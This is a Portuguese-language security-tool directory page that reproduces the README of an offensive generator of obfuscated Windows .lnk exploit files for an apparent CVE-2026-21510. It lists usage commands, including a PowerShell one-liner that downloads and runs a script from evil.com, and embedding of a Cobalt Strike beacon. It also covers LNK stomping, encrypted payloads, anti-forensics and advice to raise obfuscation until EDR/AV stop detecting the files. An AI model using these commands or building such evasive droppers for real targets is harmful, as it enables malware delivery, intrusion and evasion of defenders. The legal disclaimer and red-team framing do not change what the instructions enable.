Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
EpSiLoNPoInTlnk — Gera arquivos .lnk ofuscados explorando o CVE-2026-21510 com LNK stomping, payloads criptografados e antiforense para testes de penetração autorizados e operações de red team. | Kitploit
Ferramentas/GitHubGitHub/epsilonpointori/epsilonpointlnk
ExploraçãoExploração de Aplicações WebAnálise de MalwareTestes de PenetraçãoRed TeamingDesenvolvimento de PayloadsAnti-Bot
GitHubepsilonpointori/epsilonpointlnk

EpSiLoNPoInTlnk

Gera arquivos .lnk ofuscados explorando o CVE-2026-21510 com LNK stomping, payloads criptografados e antiforense para testes de penetração autorizados e operações de red team.

Ver Repositório
28há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

README EpSiLoNPoInTlnk CVE-2026-21510 - Gerador de .LNK Ferramenta para geração de arquivos .lnk usando a vulnerabilidade CVE-2026-21510 (Windows ShellLink Remote Code Execution). Projetada para pesquisa em segurança ofensiva, testes de penetração autorizados e análise de vulnerabilidades.

Aviso Legal ⚠️ ESTA FERRAMENTA É DESTINADA EXCLUSIVAMENTE A USO LEGAL E AUTORIZADO. Qualquer uso não autorizado contra sistemas ou redes violaria as leis locais e internacionais (ex: Computer Fraud and Abuse Act (CFAA), GDPR, Lei Godfrain na França). O autor se isenta de qualquer responsabilidade em caso de uso indevido. (Consulte a Cláusula de Isenção de Responsabilidade abaixo.)

Descrição Este gerador cria arquivos .lnk ofuscados para explorar a CVE-2026-21510, uma vulnerabilidade no processamento de atalhos do Windows. Ele integra:

LNK Stomping (5 variantes: dot, path_segment, relative, double_extension, unicode)

PropertyStore com CLSIDs aleatórios e PKEYs

KnownFolderDataBlock (KnownFolderIDs aleatórios ou direcionados)

EnvironmentVariableDataBlock (ofuscação Unicode, variáveis dinâmicas)

Ofuscação (Níveis 1-5: TrackerDataBlock, ConsoleDataBlock, blocos aleatórios)

Payloads embutidos e criptografados (AES-256-CBC + XOR)

Anti-Forense (timestamps zerados, tamanho do arquivo zerado, metadados mínimos)

Contorno de EDR/AV (processos legítimos, argumentos ofuscados em PowerShell)

Geração de variantes aleatórias (10+ variantes únicas para evitar assinaturas)

Pré-requisitos Sistema SO: Windows (para testar os .lnk gerados) ou Linux/macOS (para a geração).

Python: ≥ 3.10. Dependências: pip install pycryptodome

Ferramentas Recomendadas Análise: PEStudio, Detect It Easy (DIE)

Debug: x64dbg, WinDbg

Testes: Máquina virtual Windows (ex: Windows 10/11 no VirtualBox) isolada.

Instalação Clonar o repositório: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Instalar as dependências: pip install -r requirements.txt (Opcional) Criar um ambiente virtual: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows

Uso

  1. Geração Básica python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Gera um .lnk usando a CVE-2026-21510 para executar o calc.exe.

  • Opções Avançadas Opção Descrição Valor padrão --target Caminho alvo (ex: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Argumentos para o alvo (ex: /c whoami) /c calc.exe --output Caminho de saída do .lnk ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Diretório de trabalho C:\Windows\System32 --description Descrição do atalho String aleatória --unc Usar caminho UNC (?\C:...) False --lnk-stomping Ativar o LNK Stomping True --stomping-variant Variante de LNK Stomping (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Adicionar blocos ExtraData inúteis True --obfuscation-level Nível de ofuscação (1-5) 5 --embed-payload Caminho para um arquivo a ser embutido (ex: payload.bin) None --encrypt-payload Criptografar o payload (AES-256-CBC + XOR) True --anti-forensics Aplicar técnicas anti-forenses True --randomize-clsid Randomizar o CLSID no PropertyStore True --randomize-known-folder Randomizar o KnownFolderID True --obfuscate-arguments Ofuscar os argumentos (PowerShell) True --generate-variants Gerar N variantes aleatórias 0 --debug Modo debug avançado (logs detalhados) False

  • Exemplos Exemplo 1: Exploit com Payload Embutido python lnkstomperpoint.py
    --target "C:\Windows\System32\cmd.exe"
    --args "/c payload.exe"
    --embed-payload ./malware.bin
    --output exploit_with_payload.lnk
    --obfuscation-level 5
    --anti-forensics Gera um .lnk com um payload criptografado (AES-256 + XOR) e ofuscado.

  • Exemplo 2: Geração de 10 Variantes Aleatórias python lnkstomperpoint.py
    --target "C:\Windows\System32\powershell.exe"
    --args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
    --generate-variants 10
    --output-dir ./variants Cria 10 variantes únicas para evitar assinaturas de EDR/AV.

    Exemplo 3: Modo Minimalista (para testes) python lnkstomperpoint.py
    --target "C:\Windows\System32\notepad.exe"
    --obfuscation False
    --anti-forensics False
    --output minimal_exploit.lnk Gera um .lnk não ofuscado (para análise ou debug).

    Funcionamento Técnico

    1. Estrutura do .LNK O arquivo .lnk gerado segue a especificação MS-SHLLINK com as seguintes extensões:

    Cabeçalho ShellLink (0x4C bytes fixos + offsets): LinkCLSID: 00021401-0000-0000-C000-000000000046 (obrigatório). LinkFlags: Configurado para ativar HasRelativePath, HasWorkingDir, IsUnicode, etc.

    StringData: RelativePath: Caminho alvo (com LNK Stomping se ativado). WorkingDir: Diretório de trabalho (ex: C:\Windows\System32). Arguments: Argumentos ofuscados (PowerShell, cmd, etc.).

    Blocos ExtraData (ordem crítica): PropertyStoreDataBlock: Contém PKEY_AppUserModel_ID (CLSID aleatório). KnownFolderDataBlock: Aponta para uma pasta do sistema (ex: %SystemRoot%). EnvironmentVariableDataBlock: Força a expansão das variáveis antes do Mark-of-the-Web (MotW). Blocos de Ofuscação (conforme obfuscation_level): TrackerDataBlock (Nível 1) ConsoleDataBlock (Nível 2) DarwinDataBlock, ShimDataBlock, etc. (Níveis 3-5)

    Payload Embutido (se --embed-payload): Criptografado com AES-256-CBC + XOR.

    1. Técnicas de Contorno Técnica Descrição Impacto LNK Stomping Adiciona caracteres invisíveis (., , \u202e) ao caminho alvo. Contorna detecções baseadas em assinaturas de caminhos. PropertyStore Usa PKEYs com CLSIDs aleatórios para evitar assinaturas. Evita regras YARA/EDR que visam CLSIDs conhecidos. KnownFolder Aponta para pastas do sistema (%SystemRoot%, %Temp%). Contorna restrições de caminhos absolutos. EnvironmentVariable Ofusca o caminho com variáveis (%TEMP%, %APPDATA%). Evita detecções estáticas. Ofuscação Nível 5 Adiciona blocos ExtraData aleatórios e padding. Dificulta a análise estática. Anti-Forense Zera timestamps, tamanho do arquivo, etc. Dificulta a análise forense. Argumentos Ofuscados Usa técnicas PowerShell (Base64, XOR, Reverse). Contorna detecções de comandos maliciosos.
    2. Criptografia do Payload Se --embed-payload estiver ativado:

    O payload é criptografado com AES-256-CBC (chave aleatória de 32 bytes, IV de 16 bytes).

    Uma camada XOR é aplicada com os primeiros 16 bytes da chave AES.

    A chave e o IV são armazenados em um ShimDataBlock para descriptografia posterior.

    Testes e Validação

    1. Validação Automática O gerador inclui uma função _validate() que verifica:

    O tamanho mínimo do arquivo.

    A validade do HeaderSize e do CLSID.

    A presença dos LinkFlags necessários.

    A estrutura dos blocos ExtraData (PropertyStore, KnownFolder, etc.).

    1. Testes Manuais Análise Estática: Usar PEStudio para verificar a estrutura do .lnk. Verificar se os blocos ExtraData estão presentes.

    Execução (em um ambiente isolado): Clicar duas vezes no .lnk e observar o comportamento. Usar Process Monitor (ProcMon) para analisar as chamadas de sistema.

    Detecção EDR/AV: Testar com ferramentas como Windows Defender ou CrowdStrike. Se o .lnk for detectado, aumentar o obfuscation_level ou desativar certas opções.

    Casos de Uso Cenário Comando Descrição Teste de Penetração --target "C:\Windows\System32\cmd.exe" --args "/c whoami" Verifica se o exploit funciona em uma máquina alvo. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 Gera um .lnk com um payload Cobalt Strike ofuscado. Pesquisa --generate-variants 50 --output-dir ./samples Cria 50 variantes para testar detecções de EDR. Debug --debug --obfuscation False Exibe logs detalhados para analisar a estrutura do .lnk. Contribuições As contribuições são bem-vindas! Veja como contribuir:

    Faça um fork do projeto.

    Crie uma branch (git checkout -b feature/minha-nova-funcionalidade).

    Commit suas alterações (git commit -m "Adição da funcionalidade X").

    Envie para a branch (git push origin feature/minha-nova-funcionalidade).

    Abra uma Pull Request. Ideias de Contribuições:

    Adicionar novas variantes de LNK Stomping.

    Implementar outros algoritmos de criptografia (ex: ChaCha20).

    Melhorar a ofuscação dos argumentos (ex: uso de JScript).

    Adicionar testes unitários para validar as estruturas .lnk.

    Licença Este projeto está licenciado sob a MIT. Consulte o arquivo LICENSE para mais detalhes.

    Cláusula de Isenção de Responsabilidade 🚨 Cláusula de Isenção de Responsabilidade

    📜 CLÁUSULA DE ISENÇÃO DE RESPONSABILIDADE (DISCLAIMER)

    Leia atentamente antes de usar esta ferramenta.

    ⚠️ AVISO JURÍDICO EXPLÍCITO

    O usuário desta ferramenta (doravante denominado "o Usuário") reconhece e aceita expressamente os seguintes termos:

    Uso Apenas Legal

    Esta ferramenta é exclusivamente destinada a uso legal e autorizado, tal como:

    Pesquisa em segurança da informação em um contexto acadêmico ou profissional.

    Testes de penetração (pentest) em sistemas para os quais o Usuário tenha autorização por escrito do proprietário.

    Análise de vulnerabilidades em ambientes controlados (ex: laboratórios de segurança, CTF, bug bounty autorizados).

    Qualquer outro uso é estritamente proibido e pode constituir infração penal em muitas jurisdições, incluindo (mas não se limitando a):

    França: Lei nº 88-19 de 5 de janeiro de 1988 (Lei Godfrain), artigos 323-1 a 323-7 do Código Penal (acesso fraudulento, modificação de dados, etc.).

    União Europeia: Diretiva 2013/40/UE sobre ataques contra sistemas de informação.

    Estados Unidos: Computer Fraud and Abuse Act (CFAA), 18 U.S. Code § 1030.

    Outros países: Leis locais equivalentes (ex: Computer Misuse Act no Reino Unido).

    Ausência de Garantia

    O Autor (EpSiLoNPoInT) não fornece nenhuma garantia, explícita ou implícita, sobre:

    A confiabilidade, precisão ou utilidade desta ferramenta.

    A ausência de bugs ou vulnerabilidades no código.

    A compatibilidade com todos os sistemas ou ambientes.

    Os resultados obtidos durante o uso da ferramenta.

    O Usuário assume todos os riscos relacionados ao uso desta ferramenta, incluindo (mas não se limitando a):

    Danos materiais ou de software causados ao seu próprio sistema ou a sistemas de terceiros.

    Consequências legais em caso de violação das leis aplicáveis.

    Perda de dados ou interrupções de serviço.

    Limitação de Responsabilidade

    Em nenhum caso, o Autor, os contribuidores ou qualquer outra parte envolvida na criação, produção ou distribuição desta ferramenta poderá ser responsabilizado por:

    Quaisquer danos (diretos, indiretos, incidentais, especiais, exemplares ou consequenciais), incluindo (mas não se limitando a):

    Perdas de lucros.

    Perda de dados ou corrupção de arquivos.

    Danos à reputação.

    Ações judiciais ou multas incorridas pelo Usuário.

    Mesmo que o Autor tenha sido informado da possibilidade de tais danos.

    Conformidade com Leis e Regulamentos

    O Usuário se compromete a cumprir todas as leis, regulamentos e normas aplicáveis em sua jurisdição, incluindo (mas não se limitando a):

    Leis de proteção de dados (ex: GDPR na UE).

    Leis de segurança cibernética e fraude informática.

    Políticas de segurança de seu empregador ou organização.

    O Usuário indenizará e isentará o Autor de qualquer reclamação, dano ou despesa (incluindo honorários advocatícios) decorrente de violação dessas leis ou compromissos.

    Proibição de Redistribuição Maliciosa

    O Usuário está formalmente proibido de:

    Vender, alugar ou redistribuir esta ferramenta para fins maliciosos.

    Modificar o código para transformá-lo em uma arma cibercriminosa (ex: ransomware, spyware).

    Usar esta ferramenta para atingir infraestruturas críticas (ex: hospitais, governos, bancos) sem autorização explícita.

    Compartilhar esta ferramenta com terceiros sem comunicar esta cláusula de isenção de responsabilidade.

    Exclusão de Responsabilidade por Terceiros

    Esta ferramenta pode interagir com bibliotecas de terceiros (ex: pycryptodome).

    O Autor não controla e não é responsável pelas ações ou vulnerabilidades dessas bibliotecas.

    O Usuário deve verificar a licença e a segurança de qualquer dependência utilizada.

    Uso por Sua Conta e Risco

    Ao usar esta ferramenta, você aceita plena e incondicionalmente os termos desta cláusula.

    Se você não concorda com estes termos, não use esta ferramenta e exclua imediatamente todas as cópias em sua posse.

    Jurisdição e Lei Aplicável

    Esta cláusula é regida e interpretada de acordo com as leis da República Francesa.

    Qualquer disputa decorrente ou relacionada a esta cláusula ou ao uso desta ferramenta estará sujeita à jurisdição exclusiva dos tribunais de Paris (França).

    🔐 Recomendações de Segurança

    Para um uso seguro e legal desta ferramenta: ✅ Sempre isole os testes em um ambiente virtual (ex: VirtualBox, VMware). ✅ Obtenha autorização por escrito antes de testar em sistemas que não lhe pertencem. ✅ Desative as conexões de rede das máquinas de teste para evitar vazamentos acidentais. ✅ Use ferramentas de monitoramento (ex: Wireshark, Process Monitor) para analisar o comportamento. ✅ Reporte vulnerabilidades de forma responsável (ex: por meio de programas de bug bounty). ❌ Nunca teste em sistemas de produção sem autorização. ❌ Não compartilhe os exploits gerados com pessoas não autorizadas. ❌ Não armazene payloads maliciosos em sistemas acessíveis ao público.

    📞 Contato

    Para qualquer questão legal ou técnica sobre esta ferramenta:

    Autor: EpSiLoNPoInT

    E-mail: [email protected]

    GitHub: EpSiLoNPoInTOrI

    ⚠️ Nota: O Autor não fornecerá nenhum suporte para usos ilegais ou antiéticos desta ferramenta.

    📅 Data da Cláusula

    Última atualização: 9 de maio de 2026 Versão: 1.0

    Baixar ferramenta